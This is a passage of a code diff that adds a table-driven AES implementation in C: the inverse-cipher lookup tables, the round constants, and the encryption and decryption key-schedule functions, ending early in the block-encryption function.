+    0x1998fb24U, 0xd6bde997U, 0x894043ccU, 0x67d99e77U,
+    0xb0e842bdU, 0x07898b88U, 0xe7195b38U, 0x79c8eedbU,
+    0xa17c0a47U, 0x7c420fe9U, 0xf8841ec9U, 0x00000000U,
+    0x09808683U, 0x322bed48U, 0x1e1170acU, 0x6c5a724eU,
+    0xfd0efffbU, 0x0f853856U, 0x3daed51eU, 0x362d3927U,
+    0x0a0fd964U, 0x685ca621U, 0x9b5b54d1U, 0x24362e3aU,
+    0x0c0a67b1U, 0x9357e70fU, 0xb4ee96d2U, 0x1b9b919eU,
+    0x80c0c54fU, 0x61dc20a2U, 0x5a774b69U, 0x1c121a16U,
+    0xe293ba0aU, 0xc0a02ae5U, 0x3c22e043U, 0x121b171dU,
+    0x0e090d0bU, 0xf28bc7adU, 0x2db6a8b9U, 0x141ea9c8U,
+    0x57f11985U, 0xaf75074cU, 0xee99ddbbU, 0xa37f60fdU,
+    0xf701269fU, 0x5c72f5bcU, 0x44663bc5U, 0x5bfb7e34U,
+    0x8b432976U, 0xcb23c6dcU, 0xb6edfc68U, 0xb8e4f163U,
+    0xd731dccaU, 0x42638510U, 0x13972240U, 0x84c61120U,
+    0x854a247dU, 0xd2bb3df8U, 0xaef93211U, 0xc729a16dU,
+    0x1d9e2f4bU, 0xdcb230f3U, 0x0d8652ecU, 0x77c1e3d0U,
+    0x2bb3166cU, 0xa970b999U, 0x119448faU, 0x47e96422U,
+    0xa8fc8cc4U, 0xa0f03f1aU, 0x567d2cd8U, 0x223390efU,
+    0x87494ec7U, 0xd938d1c1U, 0x8ccaa2feU, 0x98d40b36U,
+    0xa6f581cfU, 0xa57ade28U, 0xdab78e26U, 0x3fadbfa4U,
+    0x2c3a9de4U, 0x5078920dU, 0x6a5fcc9bU, 0x547e4662U,
+    0xf68d13c2U, 0x90d8b8e8U, 0x2e39f75eU, 0x82c3aff5U,
+    0x9f5d80beU, 0x69d0937cU, 0x6fd52da9U, 0xcf2512b3U,
+    0xc8ac993bU, 0x10187da7U, 0xe89c636eU, 0xdb3bbb7bU,
+    0xcd267809U, 0x6e5918f4U, 0xec9ab701U, 0x834f9aa8U,
+    0xe6956e65U, 0xaaffe67eU, 0x21bccf08U, 0xef15e8e6U,
+    0xbae79bd9U, 0x4a6f36ceU, 0xea9f09d4U, 0x29b07cd6U,
+    0x31a4b2afU, 0x2a3f2331U, 0xc6a59430U, 0x35a266c0U,
+    0x744ebc37U, 0xfc82caa6U, 0xe090d0b0U, 0x33a7d815U,
+    0xf104984aU, 0x41ecdaf7U, 0x7fcd500eU, 0x1791f62fU,
+    0x764dd68dU, 0x43efb04dU, 0xccaa4d54U, 0xe49604dfU,
+    0x9ed1b5e3U, 0x4c6a881bU, 0xc12c1fb8U, 0x4665517fU,
+    0x9d5eea04U, 0x018c355dU, 0xfa877473U, 0xfb0b412eU,
+    0xb3671d5aU, 0x92dbd252U, 0xe9105633U, 0x6dd64713U,
+    0x9ad7618cU, 0x37a10c7aU, 0x59f8148eU, 0xeb133c89U,
+    0xcea927eeU, 0xb761c935U, 0xe11ce5edU, 0x7a47b13cU,
+    0x9cd2df59U, 0x55f2733fU, 0x1814ce79U, 0x73c737bfU,
+    0x53f7cdeaU, 0x5ffdaa5bU, 0xdf3d6f14U, 0x7844db86U,
+    0xcaaff381U, 0xb968c43eU, 0x3824342cU, 0xc2a3405fU,
+    0x161dc372U, 0xbce2250cU, 0x283c498bU, 0xff0d9541U,
+    0x39a80171U, 0x080cb3deU, 0xd8b4e49cU, 0x6456c190U,
+    0x7bcb8461U, 0xd532b670U, 0x486c5c74U, 0xd0b85742U,
+};
+static const u32 Td1[256] = {
+    0x5051f4a7U, 0x537e4165U, 0xc31a17a4U, 0x963a275eU,
+    0xcb3bab6bU, 0xf11f9d45U, 0xabacfa58U, 0x934be303U,
+    0x552030faU, 0xf6ad766dU, 0x9188cc76U, 0x25f5024cU,
+    0xfc4fe5d7U, 0xd7c52acbU, 0x80263544U, 0x8fb562a3U,
+    0x49deb15aU, 0x6725ba1bU, 0x9845ea0eU, 0xe15dfec0U,
+    0x02c32f75U, 0x12814cf0U, 0xa38d4697U, 0xc66bd3f9U,
+    0xe7038f5fU, 0x9515929cU, 0xebbf6d7aU, 0xda955259U,
+    0x2dd4be83U, 0xd3587421U, 0x2949e069U, 0x448ec9c8U,
+    0x6a75c289U, 0x78f48e79U, 0x6b99583eU, 0xdd27b971U,
+    0xb6bee14fU, 0x17f088adU, 0x66c920acU, 0xb47dce3aU,
+    0x1863df4aU, 0x82e51a31U, 0x60975133U, 0x4562537fU,
+    0xe0b16477U, 0x84bb6baeU, 0x1cfe81a0U, 0x94f9082bU,
+    0x58704868U, 0x198f45fdU, 0x8794de6cU, 0xb7527bf8U,
+    0x23ab73d3U, 0xe2724b02U, 0x57e31f8fU, 0x2a6655abU,
+    0x07b2eb28U, 0x032fb5c2U, 0x9a86c57bU, 0xa5d33708U,
+    0xf2302887U, 0xb223bfa5U, 0xba02036aU, 0x5ced1682U,
+    0x2b8acf1cU, 0x92a779b4U, 0xf0f307f2U, 0xa14e69e2U,
+    0xcd65daf4U, 0xd50605beU, 0x1fd13462U, 0x8ac4a6feU,
+    0x9d342e53U, 0xa0a2f355U, 0x32058ae1U, 0x75a4f6ebU,
+    0x390b83ecU, 0xaa4060efU, 0x065e719fU, 0x51bd6e10U,
+    0xf93e218aU, 0x3d96dd06U, 0xaedd3e05U, 0x464de6bdU,
+    0xb591548dU, 0x0571c45dU, 0x6f0406d4U, 0xff605015U,
+    0x241998fbU, 0x97d6bde9U, 0xcc894043U, 0x7767d99eU,
+    0xbdb0e842U, 0x8807898bU, 0x38e7195bU, 0xdb79c8eeU,
+    0x47a17c0aU, 0xe97c420fU, 0xc9f8841eU, 0x00000000U,
+    0x83098086U, 0x48322bedU, 0xac1e1170U, 0x4e6c5a72U,
+    0xfbfd0effU, 0x560f8538U, 0x1e3daed5U, 0x27362d39U,
+    0x640a0fd9U, 0x21685ca6U, 0xd19b5b54U, 0x3a24362eU,
+    0xb10c0a67U, 0x0f9357e7U, 0xd2b4ee96U, 0x9e1b9b91U,
+    0x4f80c0c5U, 0xa261dc20U, 0x695a774bU, 0x161c121aU,
+    0x0ae293baU, 0xe5c0a02aU, 0x433c22e0U, 0x1d121b17U,
+    0x0b0e090dU, 0xadf28bc7U, 0xb92db6a8U, 0xc8141ea9U,
+    0x8557f119U, 0x4caf7507U, 0xbbee99ddU, 0xfda37f60U,
+    0x9ff70126U, 0xbc5c72f5U, 0xc544663bU, 0x345bfb7eU,
+    0x768b4329U, 0xdccb23c6U, 0x68b6edfcU, 0x63b8e4f1U,
+    0xcad731dcU, 0x10426385U, 0x40139722U, 0x2084c611U,
+    0x7d854a24U, 0xf8d2bb3dU, 0x11aef932U, 0x6dc729a1U,
+    0x4b1d9e2fU, 0xf3dcb230U, 0xec0d8652U, 0xd077c1e3U,
+    0x6c2bb316U, 0x99a970b9U, 0xfa119448U, 0x2247e964U,
+    0xc4a8fc8cU, 0x1aa0f03fU, 0xd8567d2cU, 0xef223390U,
+    0xc787494eU, 0xc1d938d1U, 0xfe8ccaa2U, 0x3698d40bU,
+    0xcfa6f581U, 0x28a57adeU, 0x26dab78eU, 0xa43fadbfU,
+    0xe42c3a9dU, 0x0d507892U, 0x9b6a5fccU, 0x62547e46U,
+    0xc2f68d13U, 0xe890d8b8U, 0x5e2e39f7U, 0xf582c3afU,
+    0xbe9f5d80U, 0x7c69d093U, 0xa96fd52dU, 0xb3cf2512U,
+    0x3bc8ac99U, 0xa710187dU, 0x6ee89c63U, 0x7bdb3bbbU,
+    0x09cd2678U, 0xf46e5918U, 0x01ec9ab7U, 0xa8834f9aU,
+    0x65e6956eU, 0x7eaaffe6U, 0x0821bccfU, 0xe6ef15e8U,
+    0xd9bae79bU, 0xce4a6f36U, 0xd4ea9f09U, 0xd629b07cU,
+    0xaf31a4b2U, 0x312a3f23U, 0x30c6a594U, 0xc035a266U,
+    0x37744ebcU, 0xa6fc82caU, 0xb0e090d0U, 0x1533a7d8U,
+    0x4af10498U, 0xf741ecdaU, 0x0e7fcd50U, 0x2f1791f6U,
+    0x8d764dd6U, 0x4d43efb0U, 0x54ccaa4dU, 0xdfe49604U,
+    0xe39ed1b5U, 0x1b4c6a88U, 0xb8c12c1fU, 0x7f466551U,
+    0x049d5eeaU, 0x5d018c35U, 0x73fa8774U, 0x2efb0b41U,
+    0x5ab3671dU, 0x5292dbd2U, 0x33e91056U, 0x136dd647U,
+    0x8c9ad761U, 0x7a37a10cU, 0x8e59f814U, 0x89eb133cU,
+    0xeecea927U, 0x35b761c9U, 0xede11ce5U, 0x3c7a47b1U,
+    0x599cd2dfU, 0x3f55f273U, 0x791814ceU, 0xbf73c737U,
+    0xea53f7cdU, 0x5b5ffdaaU, 0x14df3d6fU, 0x867844dbU,
+    0x81caaff3U, 0x3eb968c4U, 0x2c382434U, 0x5fc2a340U,
+    0x72161dc3U, 0x0cbce225U, 0x8b283c49U, 0x41ff0d95U,
+    0x7139a801U, 0xde080cb3U, 0x9cd8b4e4U, 0x906456c1U,
+    0x617bcb84U, 0x70d532b6U, 0x74486c5cU, 0x42d0b857U,
+};
+static const u32 Td2[256] = {
+    0xa75051f4U, 0x65537e41U, 0xa4c31a17U, 0x5e963a27U,
+    0x6bcb3babU, 0x45f11f9dU, 0x58abacfaU, 0x03934be3U,
+    0xfa552030U, 0x6df6ad76U, 0x769188ccU, 0x4c25f502U,
+    0xd7fc4fe5U, 0xcbd7c52aU, 0x44802635U, 0xa38fb562U,
+    0x5a49deb1U, 0x1b6725baU, 0x0e9845eaU, 0xc0e15dfeU,
+    0x7502c32fU, 0xf012814cU, 0x97a38d46U, 0xf9c66bd3U,
+    0x5fe7038fU, 0x9c951592U, 0x7aebbf6dU, 0x59da9552U,
+    0x832dd4beU, 0x21d35874U, 0x692949e0U, 0xc8448ec9U,
+    0x896a75c2U, 0x7978f48eU, 0x3e6b9958U, 0x71dd27b9U,
+    0x4fb6bee1U, 0xad17f088U, 0xac66c920U, 0x3ab47dceU,
+    0x4a1863dfU, 0x3182e51aU, 0x33609751U, 0x7f456253U,
+    0x77e0b164U, 0xae84bb6bU, 0xa01cfe81U, 0x2b94f908U,
+    0x68587048U, 0xfd198f45U, 0x6c8794deU, 0xf8b7527bU,
+    0xd323ab73U, 0x02e2724bU, 0x8f57e31fU, 0xab2a6655U,
+    0x2807b2ebU, 0xc2032fb5U, 0x7b9a86c5U, 0x08a5d337U,
+    0x87f23028U, 0xa5b223bfU, 0x6aba0203U, 0x825ced16U,
+    0x1c2b8acfU, 0xb492a779U, 0xf2f0f307U, 0xe2a14e69U,
+    0xf4cd65daU, 0xbed50605U, 0x621fd134U, 0xfe8ac4a6U,
+    0x539d342eU, 0x55a0a2f3U, 0xe132058aU, 0xeb75a4f6U,
+    0xec390b83U, 0xefaa4060U, 0x9f065e71U, 0x1051bd6eU,
+    0x8af93e21U, 0x063d96ddU, 0x05aedd3eU, 0xbd464de6U,
+    0x8db59154U, 0x5d0571c4U, 0xd46f0406U, 0x15ff6050U,
+    0xfb241998U, 0xe997d6bdU, 0x43cc8940U, 0x9e7767d9U,
+    0x42bdb0e8U, 0x8b880789U, 0x5b38e719U, 0xeedb79c8U,
+    0x0a47a17cU, 0x0fe97c42U, 0x1ec9f884U, 0x00000000U,
+    0x86830980U, 0xed48322bU, 0x70ac1e11U, 0x724e6c5aU,
+    0xfffbfd0eU, 0x38560f85U, 0xd51e3daeU, 0x3927362dU,
+    0xd9640a0fU, 0xa621685cU, 0x54d19b5bU, 0x2e3a2436U,
+    0x67b10c0aU, 0xe70f9357U, 0x96d2b4eeU, 0x919e1b9bU,
+    0xc54f80c0U, 0x20a261dcU, 0x4b695a77U, 0x1a161c12U,
+    0xba0ae293U, 0x2ae5c0a0U, 0xe0433c22U, 0x171d121bU,
+    0x0d0b0e09U, 0xc7adf28bU, 0xa8b92db6U, 0xa9c8141eU,
+    0x198557f1U, 0x074caf75U, 0xddbbee99U, 0x60fda37fU,
+    0x269ff701U, 0xf5bc5c72U, 0x3bc54466U, 0x7e345bfbU,
+    0x29768b43U, 0xc6dccb23U, 0xfc68b6edU, 0xf163b8e4U,
+    0xdccad731U, 0x85104263U, 0x22401397U, 0x112084c6U,
+    0x247d854aU, 0x3df8d2bbU, 0x3211aef9U, 0xa16dc729U,
+    0x2f4b1d9eU, 0x30f3dcb2U, 0x52ec0d86U, 0xe3d077c1U,
+    0x166c2bb3U, 0xb999a970U, 0x48fa1194U, 0x642247e9U,
+    0x8cc4a8fcU, 0x3f1aa0f0U, 0x2cd8567dU, 0x90ef2233U,
+    0x4ec78749U, 0xd1c1d938U, 0xa2fe8ccaU, 0x0b3698d4U,
+    0x81cfa6f5U, 0xde28a57aU, 0x8e26dab7U, 0xbfa43fadU,
+    0x9de42c3aU, 0x920d5078U, 0xcc9b6a5fU, 0x4662547eU,
+    0x13c2f68dU, 0xb8e890d8U, 0xf75e2e39U, 0xaff582c3U,
+    0x80be9f5dU, 0x937c69d0U, 0x2da96fd5U, 0x12b3cf25U,
+    0x993bc8acU, 0x7da71018U, 0x636ee89cU, 0xbb7bdb3bU,
+    0x7809cd26U, 0x18f46e59U, 0xb701ec9aU, 0x9aa8834fU,
+    0x6e65e695U, 0xe67eaaffU, 0xcf0821bcU, 0xe8e6ef15U,
+    0x9bd9bae7U, 0x36ce4a6fU, 0x09d4ea9fU, 0x7cd629b0U,
+    0xb2af31a4U, 0x23312a3fU, 0x9430c6a5U, 0x66c035a2U,
+    0xbc37744eU, 0xcaa6fc82U, 0xd0b0e090U, 0xd81533a7U,
+    0x984af104U, 0xdaf741ecU, 0x500e7fcdU, 0xf62f1791U,
+    0xd68d764dU, 0xb04d43efU, 0x4d54ccaaU, 0x04dfe496U,
+    0xb5e39ed1U, 0x881b4c6aU, 0x1fb8c12cU, 0x517f4665U,
+    0xea049d5eU, 0x355d018cU, 0x7473fa87U, 0x412efb0bU,
+    0x1d5ab367U, 0xd25292dbU, 0x5633e910U, 0x47136dd6U,
+    0x618c9ad7U, 0x0c7a37a1U, 0x148e59f8U, 0x3c89eb13U,
+    0x27eecea9U, 0xc935b761U, 0xe5ede11cU, 0xb13c7a47U,
+    0xdf599cd2U, 0x733f55f2U, 0xce791814U, 0x37bf73c7U,
+    0xcdea53f7U, 0xaa5b5ffdU, 0x6f14df3dU, 0xdb867844U,
+    0xf381caafU, 0xc43eb968U, 0x342c3824U, 0x405fc2a3U,
+    0xc372161dU, 0x250cbce2U, 0x498b283cU, 0x9541ff0dU,
+    0x017139a8U, 0xb3de080cU, 0xe49cd8b4U, 0xc1906456U,
+    0x84617bcbU, 0xb670d532U, 0x5c74486cU, 0x5742d0b8U,
+};
+static const u32 Td3[256] = {
+    0xf4a75051U, 0x4165537eU, 0x17a4c31aU, 0x275e963aU,
+    0xab6bcb3bU, 0x9d45f11fU, 0xfa58abacU, 0xe303934bU,
+    0x30fa5520U, 0x766df6adU, 0xcc769188U, 0x024c25f5U,
+    0xe5d7fc4fU, 0x2acbd7c5U, 0x35448026U, 0x62a38fb5U,
+    0xb15a49deU, 0xba1b6725U, 0xea0e9845U, 0xfec0e15dU,
+    0x2f7502c3U, 0x4cf01281U, 0x4697a38dU, 0xd3f9c66bU,
+    0x8f5fe703U, 0x929c9515U, 0x6d7aebbfU, 0x5259da95U,
+    0xbe832dd4U, 0x7421d358U, 0xe0692949U, 0xc9c8448eU,
+    0xc2896a75U, 0x8e7978f4U, 0x583e6b99U, 0xb971dd27U,
+    0xe14fb6beU, 0x88ad17f0U, 0x20ac66c9U, 0xce3ab47dU,
+    0xdf4a1863U, 0x1a3182e5U, 0x51336097U, 0x537f4562U,
+    0x6477e0b1U, 0x6bae84bbU, 0x81a01cfeU, 0x082b94f9U,
+    0x48685870U, 0x45fd198fU, 0xde6c8794U, 0x7bf8b752U,
+    0x73d323abU, 0x4b02e272U, 0x1f8f57e3U, 0x55ab2a66U,
+    0xeb2807b2U, 0xb5c2032fU, 0xc57b9a86U, 0x3708a5d3U,
+    0x2887f230U, 0xbfa5b223U, 0x036aba02U, 0x16825cedU,
+    0xcf1c2b8aU, 0x79b492a7U, 0x07f2f0f3U, 0x69e2a14eU,
+    0xdaf4cd65U, 0x05bed506U, 0x34621fd1U, 0xa6fe8ac4U,
+    0x2e539d34U, 0xf355a0a2U, 0x8ae13205U, 0xf6eb75a4U,
+    0x83ec390bU, 0x60efaa40U, 0x719f065eU, 0x6e1051bdU,
+    0x218af93eU, 0xdd063d96U, 0x3e05aeddU, 0xe6bd464dU,
+    0x548db591U, 0xc45d0571U, 0x06d46f04U, 0x5015ff60U,
+    0x98fb2419U, 0xbde997d6U, 0x4043cc89U, 0xd99e7767U,
+    0xe842bdb0U, 0x898b8807U, 0x195b38e7U, 0xc8eedb79U,
+    0x7c0a47a1U, 0x420fe97cU, 0x841ec9f8U, 0x00000000U,
+    0x80868309U, 0x2bed4832U, 0x1170ac1eU, 0x5a724e6cU,
+    0x0efffbfdU, 0x8538560fU, 0xaed51e3dU, 0x2d392736U,
+    0x0fd9640aU, 0x5ca62168U, 0x5b54d19bU, 0x362e3a24U,
+    0x0a67b10cU, 0x57e70f93U, 0xee96d2b4U, 0x9b919e1bU,
+    0xc0c54f80U, 0xdc20a261U, 0x774b695aU, 0x121a161cU,
+    0x93ba0ae2U, 0xa02ae5c0U, 0x22e0433cU, 0x1b171d12U,
+    0x090d0b0eU, 0x8bc7adf2U, 0xb6a8b92dU, 0x1ea9c814U,
+    0xf1198557U, 0x75074cafU, 0x99ddbbeeU, 0x7f60fda3U,
+    0x01269ff7U, 0x72f5bc5cU, 0x663bc544U, 0xfb7e345bU,
+    0x4329768bU, 0x23c6dccbU, 0xedfc68b6U, 0xe4f163b8U,
+    0x31dccad7U, 0x63851042U, 0x97224013U, 0xc6112084U,
+    0x4a247d85U, 0xbb3df8d2U, 0xf93211aeU, 0x29a16dc7U,
+    0x9e2f4b1dU, 0xb230f3dcU, 0x8652ec0dU, 0xc1e3d077U,
+    0xb3166c2bU, 0x70b999a9U, 0x9448fa11U, 0xe9642247U,
+    0xfc8cc4a8U, 0xf03f1aa0U, 0x7d2cd856U, 0x3390ef22U,
+    0x494ec787U, 0x38d1c1d9U, 0xcaa2fe8cU, 0xd40b3698U,
+    0xf581cfa6U, 0x7ade28a5U, 0xb78e26daU, 0xadbfa43fU,
+    0x3a9de42cU, 0x78920d50U, 0x5fcc9b6aU, 0x7e466254U,
+    0x8d13c2f6U, 0xd8b8e890U, 0x39f75e2eU, 0xc3aff582U,
+    0x5d80be9fU, 0xd0937c69U, 0xd52da96fU, 0x2512b3cfU,
+    0xac993bc8U, 0x187da710U, 0x9c636ee8U, 0x3bbb7bdbU,
+    0x267809cdU, 0x5918f46eU, 0x9ab701ecU, 0x4f9aa883U,
+    0x956e65e6U, 0xffe67eaaU, 0xbccf0821U, 0x15e8e6efU,
+    0xe79bd9baU, 0x6f36ce4aU, 0x9f09d4eaU, 0xb07cd629U,
+    0xa4b2af31U, 0x3f23312aU, 0xa59430c6U, 0xa266c035U,
+    0x4ebc3774U, 0x82caa6fcU, 0x90d0b0e0U, 0xa7d81533U,
+    0x04984af1U, 0xecdaf741U, 0xcd500e7fU, 0x91f62f17U,
+    0x4dd68d76U, 0xefb04d43U, 0xaa4d54ccU, 0x9604dfe4U,
+    0xd1b5e39eU, 0x6a881b4cU, 0x2c1fb8c1U, 0x65517f46U,
+    0x5eea049dU, 0x8c355d01U, 0x877473faU, 0x0b412efbU,
+    0x671d5ab3U, 0xdbd25292U, 0x105633e9U, 0xd647136dU,
+    0xd7618c9aU, 0xa10c7a37U, 0xf8148e59U, 0x133c89ebU,
+    0xa927eeceU, 0x61c935b7U, 0x1ce5ede1U, 0x47b13c7aU,
+    0xd2df599cU, 0xf2733f55U, 0x14ce7918U, 0xc737bf73U,
+    0xf7cdea53U, 0xfdaa5b5fU, 0x3d6f14dfU, 0x44db8678U,
+    0xaff381caU, 0x68c43eb9U, 0x24342c38U, 0xa3405fc2U,
+    0x1dc37216U, 0xe2250cbcU, 0x3c498b28U, 0x0d9541ffU,
+    0xa8017139U, 0x0cb3de08U, 0xb4e49cd8U, 0x56c19064U,
+    0xcb84617bU, 0x32b670d5U, 0x6c5c7448U, 0xb85742d0U,
+};
+static const u8 Td4[256] = {
+    0x52U, 0x09U, 0x6aU, 0xd5U, 0x30U, 0x36U, 0xa5U, 0x38U,
+    0xbfU, 0x40U, 0xa3U, 0x9eU, 0x81U, 0xf3U, 0xd7U, 0xfbU,
+    0x7cU, 0xe3U, 0x39U, 0x82U, 0x9bU, 0x2fU, 0xffU, 0x87U,
+    0x34U, 0x8eU, 0x43U, 0x44U, 0xc4U, 0xdeU, 0xe9U, 0xcbU,
+    0x54U, 0x7bU, 0x94U, 0x32U, 0xa6U, 0xc2U, 0x23U, 0x3dU,
+    0xeeU, 0x4cU, 0x95U, 0x0bU, 0x42U, 0xfaU, 0xc3U, 0x4eU,
+    0x08U, 0x2eU, 0xa1U, 0x66U, 0x28U, 0xd9U, 0x24U, 0xb2U,
+    0x76U, 0x5bU, 0xa2U, 0x49U, 0x6dU, 0x8bU, 0xd1U, 0x25U,
+    0x72U, 0xf8U, 0xf6U, 0x64U, 0x86U, 0x68U, 0x98U, 0x16U,
+    0xd4U, 0xa4U, 0x5cU, 0xccU, 0x5dU, 0x65U, 0xb6U, 0x92U,
+    0x6cU, 0x70U, 0x48U, 0x50U, 0xfdU, 0xedU, 0xb9U, 0xdaU,
+    0x5eU, 0x15U, 0x46U, 0x57U, 0xa7U, 0x8dU, 0x9dU, 0x84U,
+    0x90U, 0xd8U, 0xabU, 0x00U, 0x8cU, 0xbcU, 0xd3U, 0x0aU,
+    0xf7U, 0xe4U, 0x58U, 0x05U, 0xb8U, 0xb3U, 0x45U, 0x06U,
+    0xd0U, 0x2cU, 0x1eU, 0x8fU, 0xcaU, 0x3fU, 0x0fU, 0x02U,
+    0xc1U, 0xafU, 0xbdU, 0x03U, 0x01U, 0x13U, 0x8aU, 0x6bU,
+    0x3aU, 0x91U, 0x11U, 0x41U, 0x4fU, 0x67U, 0xdcU, 0xeaU,
+    0x97U, 0xf2U, 0xcfU, 0xceU, 0xf0U, 0xb4U, 0xe6U, 0x73U,
+    0x96U, 0xacU, 0x74U, 0x22U, 0xe7U, 0xadU, 0x35U, 0x85U,
+    0xe2U, 0xf9U, 0x37U, 0xe8U, 0x1cU, 0x75U, 0xdfU, 0x6eU,
+    0x47U, 0xf1U, 0x1aU, 0x71U, 0x1dU, 0x29U, 0xc5U, 0x89U,
+    0x6fU, 0xb7U, 0x62U, 0x0eU, 0xaaU, 0x18U, 0xbeU, 0x1bU,
+    0xfcU, 0x56U, 0x3eU, 0x4bU, 0xc6U, 0xd2U, 0x79U, 0x20U,
+    0x9aU, 0xdbU, 0xc0U, 0xfeU, 0x78U, 0xcdU, 0x5aU, 0xf4U,
+    0x1fU, 0xddU, 0xa8U, 0x33U, 0x88U, 0x07U, 0xc7U, 0x31U,
+    0xb1U, 0x12U, 0x10U, 0x59U, 0x27U, 0x80U, 0xecU, 0x5fU,
+    0x60U, 0x51U, 0x7fU, 0xa9U, 0x19U, 0xb5U, 0x4aU, 0x0dU,
+    0x2dU, 0xe5U, 0x7aU, 0x9fU, 0x93U, 0xc9U, 0x9cU, 0xefU,
+    0xa0U, 0xe0U, 0x3bU, 0x4dU, 0xaeU, 0x2aU, 0xf5U, 0xb0U,
+    0xc8U, 0xebU, 0xbbU, 0x3cU, 0x83U, 0x53U, 0x99U, 0x61U,
+    0x17U, 0x2bU, 0x04U, 0x7eU, 0xbaU, 0x77U, 0xd6U, 0x26U,
+    0xe1U, 0x69U, 0x14U, 0x63U, 0x55U, 0x21U, 0x0cU, 0x7dU,
+};
+static const u32 rcon[] = {
+    0x01000000, 0x02000000, 0x04000000, 0x08000000,
+    0x10000000, 0x20000000, 0x40000000, 0x80000000,
+    0x1B000000, 0x36000000, /* for 128-bit blocks, Rijndael never uses more than 10 rcon values */
+};
+
+/**
+ * Expand the cipher key into the encryption key schedule.
+ */
+int private_AES_set_encrypt_key(const unsigned char *userKey, const int bits,
+                                AES_KEY *key)
+{
+
+    u32 *rk;
+    int i = 0;
+    u32 temp;
+
+    if (!userKey || !key)
+        return -1;
+    if (bits != 128 && bits != 192 && bits != 256)
+        return -2;
+
+    rk = key->rd_key;
+
+    if (bits==128)
+        key->rounds = 10;
+    else if (bits==192)
+        key->rounds = 12;
+    else
+        key->rounds = 14;
+
+    rk[0] = GETU32(userKey     );
+    rk[1] = GETU32(userKey +  4);
+    rk[2] = GETU32(userKey +  8);
+    rk[3] = GETU32(userKey + 12);
+    if (bits == 128) {
+        while (1) {
+            temp  = rk[3];
+            rk[4] = rk[0] ^
+                (Te2[(temp >> 16) & 0xff] & 0xff000000) ^
+                (Te3[(temp >>  8) & 0xff] & 0x00ff0000) ^
+                (Te0[(temp      ) & 0xff] & 0x0000ff00) ^
+                (Te1[(temp >> 24)       ] & 0x000000ff) ^
+                rcon[i];
+            rk[5] = rk[1] ^ rk[4];
+            rk[6] = rk[2] ^ rk[5];
+            rk[7] = rk[3] ^ rk[6];
+            if (++i == 10) {
+                return 0;
+            }
+            rk += 4;
+        }
+    }
+    rk[4] = GETU32(userKey + 16);
+    rk[5] = GETU32(userKey + 20);
+    if (bits == 192) {
+        while (1) {
+            temp = rk[ 5];
+            rk[ 6] = rk[ 0] ^
+                (Te2[(temp >> 16) & 0xff] & 0xff000000) ^
+                (Te3[(temp >>  8) & 0xff] & 0x00ff0000) ^
+                (Te0[(temp      ) & 0xff] & 0x0000ff00) ^
+                (Te1[(temp >> 24)       ] & 0x000000ff) ^
+                rcon[i];
+            rk[ 7] = rk[ 1] ^ rk[ 6];
+            rk[ 8] = rk[ 2] ^ rk[ 7];
+            rk[ 9] = rk[ 3] ^ rk[ 8];
+            if (++i == 8) {
+                return 0;
+            }
+            rk[10] = rk[ 4] ^ rk[ 9];
+            rk[11] = rk[ 5] ^ rk[10];
+            rk += 6;
+        }
+    }
+    rk[6] = GETU32(userKey + 24);
+    rk[7] = GETU32(userKey + 28);
+    if (bits == 256) {
+        while (1) {
+            temp = rk[ 7];
+            rk[ 8] = rk[ 0] ^
+                (Te2[(temp >> 16) & 0xff] & 0xff000000) ^
+                (Te3[(temp >>  8) & 0xff] & 0x00ff0000) ^
+                (Te0[(temp      ) & 0xff] & 0x0000ff00) ^
+                (Te1[(temp >> 24)       ] & 0x000000ff) ^
+                rcon[i];
+            rk[ 9] = rk[ 1] ^ rk[ 8];
+            rk[10] = rk[ 2] ^ rk[ 9];
+            rk[11] = rk[ 3] ^ rk[10];
+            if (++i == 7) {
+                return 0;
+            }
+            temp = rk[11];
+            rk[12] = rk[ 4] ^
+                (Te2[(temp >> 24)       ] & 0xff000000) ^
+                (Te3[(temp >> 16) & 0xff] & 0x00ff0000) ^
+                (Te0[(temp >>  8) & 0xff] & 0x0000ff00) ^
+                (Te1[(temp      ) & 0xff] & 0x000000ff);
+            rk[13] = rk[ 5] ^ rk[12];
+            rk[14] = rk[ 6] ^ rk[13];
+            rk[15] = rk[ 7] ^ rk[14];
+
+            rk += 8;
+            }
+    }
+    return 0;
+}
+
+/**
+ * Expand the cipher key into the decryption key schedule.
+ */
+int private_AES_set_decrypt_key(const unsigned char *userKey, const int bits,
+                                AES_KEY *key)
+{
+
+    u32 *rk;
+    int i, j, status;
+    u32 temp;
+
+    /* first, start with an encryption schedule */
+    status = private_AES_set_encrypt_key(userKey, bits, key);
+    if (status < 0)
+        return status;
+
+    rk = key->rd_key;
+
+    /* invert the order of the round keys: */
+    for (i = 0, j = 4*(key->rounds); i < j; i += 4, j -= 4) {
+        temp = rk[i    ]; rk[i    ] = rk[j    ]; rk[j    ] = temp;
+        temp = rk[i + 1]; rk[i + 1] = rk[j + 1]; rk[j + 1] = temp;
+        temp = rk[i + 2]; rk[i + 2] = rk[j + 2]; rk[j + 2] = temp;
+        temp = rk[i + 3]; rk[i + 3] = rk[j + 3]; rk[j + 3] = temp;
+    }
+    /* apply the inverse MixColumn transform to all round keys but the first and the last: */
+    for (i = 1; i < (key->rounds); i++) {
+        rk += 4;
+        rk[0] =
+            Td0[Te1[(rk[0] >> 24)       ] & 0xff] ^
+            Td1[Te1[(rk[0] >> 16) & 0xff] & 0xff] ^
+            Td2[Te1[(rk[0] >>  8) & 0xff] & 0xff] ^
+            Td3[Te1[(rk[0]      ) & 0xff] & 0xff];
+        rk[1] =
+            Td0[Te1[(rk[1] >> 24)       ] & 0xff] ^
+            Td1[Te1[(rk[1] >> 16) & 0xff] & 0xff] ^
+            Td2[Te1[(rk[1] >>  8) & 0xff] & 0xff] ^
+            Td3[Te1[(rk[1]      ) & 0xff] & 0xff];
+        rk[2] =
+            Td0[Te1[(rk[2] >> 24)       ] & 0xff] ^
+            Td1[Te1[(rk[2] >> 16) & 0xff] & 0xff] ^
+            Td2[Te1[(rk[2] >>  8) & 0xff] & 0xff] ^
+            Td3[Te1[(rk[2]      ) & 0xff] & 0xff];
+        rk[3] =
+            Td0[Te1[(rk[3] >> 24)       ] & 0xff] ^
+            Td1[Te1[(rk[3] >> 16) & 0xff] & 0xff] ^
+            Td2[Te1[(rk[3] >>  8) & 0xff] & 0xff] ^
+            Td3[Te1[(rk[3]      ) & 0xff] & 0xff];
+    }
+    return 0;
+}
+
+/*
+ * Encrypt a single block
+ * in and out can overlap
+ */
+void AES_encrypt(const unsigned char *in, unsigned char *out,
+                 const AES_KEY *key) {
+
+    const u32 *rk;
+    u32 s0, s1, s2, s3, t0, t1, t2, t3;
+#ifndef FULL_UNROLL
+    int r;
